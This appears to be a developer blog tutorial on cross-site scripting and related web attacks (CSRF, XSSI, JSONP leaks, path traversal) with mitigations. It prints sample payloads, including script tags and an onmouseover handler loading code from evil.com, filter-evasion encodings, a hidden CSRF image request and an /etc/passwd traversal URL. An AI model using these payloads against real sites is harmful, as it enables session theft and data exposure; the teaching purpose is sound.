Basic XSS and how to mitigate it

security, frontend

Cross Site Scripting (XSS) is a vulnerability which allows an attacker to run malicious code, typically javascript, in a victim's browser or other app which can run it.

What is a Cross Site Scripting (XSS) attack?

The "cross site" part comes because the malicious code lives in the attacker's server (or a third party the attacker has access to). There are two ways an attacker can inject malicious code into a target machine: by submitting it to sites that accept user content like comments, etc (stored XSS), or by creating malicious URLs which when browsed to, trigger the attack (reflected XSS).

Typically malicious code includes some trick to include a script tag with the code that does the damage

<script src="http://evil.com/oh-dear.js"></script> Just an innocent comment...

To defuse the attacks, code and links need to be sanitised.

Can code from different domains be run in a web page? And why?

Yes. This is Cross-Origin Resource Sharing (CORS) and there are good reasons for it.

People want to import third party code into their sites - the classic example is Google Analytics. Or they want to use versions of popular libraries stored in a CDN (think JQuery, hosted on //code.jquery.com/), hoping that your visitor will have it already in their cache by the time they visit your site. Or, for sites still using HTTP 1, they want to put their assets on different subdomain, because a browser only downloads a limited amount of files in parallel from the same domain (think Yahoo, who put all their assets on //s.yimg.com). Or a global website with a variety of localised subdomains (think amazon.de, amazon.fr ... all downloading scripts from amazon.com). Or while developing, they want to download assets from the live site (say www.example.com) while developing on a subdomain (new-version.example.com)

Can you control which domain dowloads which scripts?

There is an http header which you can set in your server, Access-Control-Allow-Origin, to control who can download your assets. This is universally supported, but it doesn't really help with xss - it was really designed to stop people using your code on their pages, while you want the opposite: you want to stop their code on your pages.

What you really want is the Content Security Policy (CSP), which tells the browser what domains are allowed to be included in a page. This is relatively new and browser support is not quite there yet.

Stored XSS: File Upload displayed in an iframe

When a site allows users to upload files which are then displayed to other users in an iframe, an attacker could upload an HTML file with a script tag inside

This is my cool HTML page <script><!--
... here I can do evil things ...
--></script>

This is a relatively simple attack to mitigate. Since you control the server where the malicious code is stored, you can simply make sure the uploaded documents are saved on a separate subdomain, say user-content.example.com, and then it won't have access to content on the main domain.

Reflected XSS

The classic reflected XSS attack tries to add a script tag to a url: https://example.com/<script>..evil.. </script>. Of course the attach will never be so blatant. But browsers and other apps can do substitutions for special characters. Although these days they have built-in protection for most cases, it's interesting to know what we are being protected against. And anyway, some day you may find yourself coding for an environment where it doesn't exist

example.com/%3cscritpt%3e
URL % encoding
example.com/%253cscritpt%253e
double URL % encoding
example.com/%c0%bcscript%c0%be
bad UTF-8 encoding
example.com/%26lt;script%26gt;
HTML encoding
example.com/%26amp;lt;script%26amp;gt;
double HTML encoding
example.com/\074script\076
ASCII encoding
example.com/\x3cscritpt\x3E
ASCII encoding with hexadecimal
example.com/\u003cscritpt\u003e
ASCII encoding with unicode
example.com/+AD4-script+ADw-
a C style encoding
...

Stored XSS

The typical stored XSS attack you have a comment system or something, and the attacker tries to submit an HTML fragment with a script tag in it. There are different ways they can try that.

Simple attacks with script tags and HTML sanitasion

The obvious way may work, if the site was built by hobbysts or amateurs. But a simple regular expression is usually enough to stop that.

Great site! <script src="http://evil.com/xss.js"></script>

Regular expressions are not the best approach though. One reason is that you can easily match valid HTML, but attackers often get around them by submitting invalid HTML, taking advantage of the fact browsers are very forgiving. So they could submit the following

Great site! <a href="<script src="http://evil.com/xss.js"></script>

Or use hidden, non-rendered characters that can break a regular expression but are ignored by many browsers

Great site! <scr\0ipt src="http://evil.com/xss.js"></sc\0ript>

Or even simply upper case letters

Great site! <SCRIPT SRC="http://evil.com/xss.js"></SCRIPT>

The best approach to sanitasion is:

  • parse the input into a DOM tree which is not rendered in the page
  • have a white list of allowed tags and attributed, and go through every node of rendered DOM, deleting what is not the whitelist
  • make sure any URLs and CSS attributes that are allowed are strictly sanitased. Careful of URLs using the javascript: protocols

Using HTML attributes for xss attacks

One doesn't necessarily need a script tag to store XSS - one can simply have some javascript in a tag attribute. The following would be triggered when someone moves the mouse over the comment

<p ONMOUSEOVER="var d=document;var s=d.createElement('script');s.src='http://evil.com/xss.js';d.appendChild(s);">Great site!</p>

Using CSS attributes for xss attacks

If a site allows user to, say, choose a color for the text of the comments, you could submit something like red;" onmouseover="...evil JS..." and then you can have

<!-- what the coder expected the final results to be when they built the site -->
<p style="color:SOME_CUSTOM_COLOR;">My Home Page</p>
<!-- what the attacker injected -->
<p style="color:red;" onmouseover="...evil JS...">My Home Page</p>

Stored Javascript

A typical XSS fragment for a site that allows user submissions:

innocent looking text and then <span style=display:none>"
+ (...evil js..., "")
+ "</span> nothing to see here

That relies on the fact that the code will be inserted into the page via JS, with code such as

$someElement.innerHTML = "innocent looking text and then <span style=display:none>"
+ (...evil js..., "")
+ "</span> nothing to see here";

The not so common comman operator at (...evil js..., "") returns the item on the right. The comma operator is often used when golfing / minifying, but not often when hand coding because of its unreadability. It simply executes the item on the left then ignores it and returns the one on the right: var a = (1, 2); console.log(a); //2.

So it is important to escape strings that will be handled by JS with \x27 for single quotes and \x22 for doubles.

Reflected XSS via AJAX

Sometimes a site runs a fragment of a paragraph. An example is Google Translate: https://translate.google.com/#en/de/...evil js..., where "...evil js..." could be <script>evil js</script> and may be inserted in the translation box and translated, if the site isn't careful (obviously Google are). The way to handle this is to escape the <> characters with \x3c\x3e. It is also important to set the charset of your document with Content-Type: text/html; charset=utf-8, to avoid the browser interpreting as utf-7, where +ADw- and +AD4- are the encodings for < and >.

Cross-Site Request Forgery (XSRF)

This happens when an attacker stores some code in a page that requests a resource (often an image, but could be the favicon too for example) from a separate third party site, for example your bank, or Facebook (unlikely they don't protect themselves from such attacks, though). If you are already logged in the third party site, the browser will send cookies and everything else to that site. So you could have an exploit such as

An innocent message, la la
<img
    // attacker hides the exploit
    style="display:none"

    // this is a (fake) command which the user needs to be logged in to run;
    // but if the user IS already logged in, then it will be run,
    // as the cookies will be sent. It doesn't matter that the response
    // is not an image, because of the display:none
    src="http://facebook.com/post/?msg=blah"
    >

To mitigate against those attacks, for a start make sure you use POST and not GET in your request. With your POST request, send a token with a timestamp, and expire login if the timestamp is too old (old = a few minutes). Generate a new token for every request. Maybe even generate different tokens for different types of requests.

Cross Site Script Inclusion (XSSI)

In this case the attacker includes your script in their page. That way they can read any variables accessible to your script, since the browser doesn't distinguish between the two environments. The simplest example is if someone has sensitive data simply embedded in the JS

// your_script.js
var privateKey = "-----BEGIN RSA PRIVATE KEY-----" // etc

// attacker_page.html
<!doctype HTML>
<html>
<head>
    <script src="your_script.js"></script>
    <script>alert(privateKey)</script>
...

Another source of attacks is JSONP, as an attacker can simply override the callback function

// attacker_page.html
<script>
    var my_callback = function (my_leaked_data) {
        doEvil(JSON.stringify(my_leaked_data));
    };
</script>
<script src="https://your_site/p?jsonp=my_callback" type="text/javascript"></script>

The defence is simply not to put sensitive information inside JS or JSONP responses. Other steps are the same as for XSRF (use POST, use tokens), and make scripts non-executables by adding prefixes such as ])}while(1);</x>

Path Traversal

The classic exploit which tries to trick the server into serving files outside the server root.

https://example.com/../../../../../../../etc/passwd

Few servers are configured by default to allow that, but be careful with customising configurations. Also, careful in allowing users to chose strings such as brett/../../ as username.

Conclusion

This is just scratching the surface of XSS and related attacks; it is a specialist fields which, however, every front end developer should at least be familiar with.